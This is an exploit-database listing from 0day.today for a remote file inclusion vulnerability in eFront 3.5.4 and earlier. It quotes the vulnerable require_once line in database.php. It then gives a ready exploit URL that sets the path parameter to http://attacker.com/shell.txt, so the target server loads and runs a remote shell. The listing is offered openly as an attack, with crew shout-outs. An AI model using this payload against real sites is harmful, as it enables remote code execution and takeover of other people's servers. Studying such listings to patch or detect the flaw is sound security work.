efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability

2009-09-15T00:00:00
ID 1337DAY-ID-5768
Type zdt
Reporter cr4wl3r
Modified 2009-09-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability
=======================================================================


########################################################################
#efront <= 3.5.4 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/efrontlearning/files/
#Author               :  cr4wl3r 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  database.php 
#line 15 require_once($path.'adodb/adodb.inc.php');
########################################################################
#3xplo!t :
#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt???  
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################



#  0day.today [2018-01-04]  #